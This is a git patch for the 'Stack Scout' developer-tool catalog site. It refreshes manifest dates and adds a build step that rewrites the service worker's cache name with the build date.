                  From 4caee1ee32c0553489a47c1bece3592672d46b57 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:42:37 +0100 Subject: [PATCH 5/5] fix: refresh service worker cache during build --- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 ++-- data/collections-manifest.json | 4 ++-- data/methodology-manifest.json | 4 ++-- data/page-registry.json | 2 +- data/radar-manifest.json | 4 ++-- data/tools-manifest.json | 4 ++-- data/updates-manifest.json | 4 ++-- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 16 ++++++++++++++++ service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 37 files changed, 58 insertions(+), 42 deletions(-) diff --git a/catalog/index.html b/catalog/index.html index 6afa345..7d20915 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

                  SyncPad

                  diff --git a/categories/apis/index.html b/categories/apis/index.html index 4175a4c..b12e7da 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

                  Anthropic API

                  diff --git a/categories/clis/index.html b/categories/clis/index.html index 81b6211..aaabad1 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

                  Wrangler

                  diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index c98a026..4df671e 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

                  SyncPad

                  diff --git a/categories/index.html b/categories/index.html index c9acbbd..64bb4cf 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

                  Desktop Apps

                  diff --git a/categories/mcps/index.html b/categories/mcps/index.html index f862d74..30e54c8 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

                  Playwright MCP

                  diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index cb3bc04..c35f706 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

                  Strudel Studio

                  diff --git a/categories/web-services/index.html b/categories/web-services/index.html index cf70f1a..15036a9 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

                  Make

                  diff --git a/categories/websites/index.html b/categories/websites/index.html index 999627d..1c17ed0 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

                  Hugging Face

                  diff --git a/collections/index.html b/collections/index.html index ae64571..c24ecb3 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

                  From the Stack Scout Lab

                  diff --git a/data/categories-manifest.json b/data/categories-manifest.json index 78826b4..0e2dc9c 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index c6f8013..871d976 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "collections": [ { "slug": "creator-stack", diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index f57652d..0f23911 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "thesis": "Stack Scout is a public guide, not a benchmark lab. 
We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/page-registry.json b/data/page-registry.json index 33a29ae..b3cacce 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-06-04", + "generatedAt": "2026-06-06", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 7d7a77b..29ddbed 100644 --- a/data/radar-manifest.json +++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Radar", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index dee2917..8074788 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 779cf1b..21ac358 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index ec7781b..7805e61 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

                  From the Stack Scout Lab

                  diff --git a/method/index.html b/method/index.html index aa83e0d..6a0e17f 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

                  Verdict language

                  diff --git a/radar/index.html b/radar/index.html index 4bc907f..cbc054e 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

                  GitHub skills ecosystem

                  diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index d390a74..e4a6b8a 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -1273,6 +1273,21 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo ` } +function updateServiceWorkerCacheName() { + const serviceWorkerPath = 'service-worker.js' + const current = fs.readFileSync(path.join(ROOT_DIR, serviceWorkerPath), 'utf8') + const next = current.replace( + /const CACHE_NAME = ['"]stackscout-\d{4}-\d{2}-\d{2}['"]/, + `const CACHE_NAME = 'stackscout-${GENERATED_AT}'`, + ) + + if (next === current) { + throw new Error('service-worker.js cache name was not updated; expected stackscout-YYYY-MM-DD declaration.') + } + + writeFile(serviceWorkerPath, next) +} + function main() { const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') @@ -1333,6 +1348,7 @@ function main() { ] writeFile('sitemap.xml', buildSitemap(sitemapRoutes)) + updateServiceWorkerCacheName() console.log( `Stack Scout build complete. Generated ${tools.length} tool pages, ${categories.length} category pages, and ${updates.length} updates.`, ) diff --git a/service-worker.js b/service-worker.js index 9ff0fb2..65ca957 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-06-04' +const CACHE_NAME = 'stackscout-2026-06-06' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index 9274b4a..de44888 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

                  n8n

                  diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index a333ebe..d247d4c 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

                  SyncPad

                  diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index 3206296..f810be3 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

                  Wrangler

                  diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index cedcfb4..34f46cc 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

                  Wrangler

                  diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 8e6dee2..437555c 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

                  GitHub MCP Server

                  diff --git a/tools/make/index.html b/tools/make/index.html index cb9981e..157e8cc 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/n8n/index.html b/tools/n8n/index.html index 2b209f0..e546569 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index b5b70ae..b717fbb 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

                  Playwright MCP

                  diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index 226bd85..cc49f23 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index d2b6b07..59e65bd 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index df9fb37..546b067 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

                  Strudel Studio

                  diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index dbd10d1..0d7dbc5 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index a5b9964..741d63b 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

                  Canvas Planner

                  diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 2bf1dc5..32cd6f1 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

                  Playwright MCP

                  diff --git a/updates/index.html b/updates/index.html index a824e2d..63d8716 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

                  Wrangler 4.58.0 improved command grouping and auth ergonomics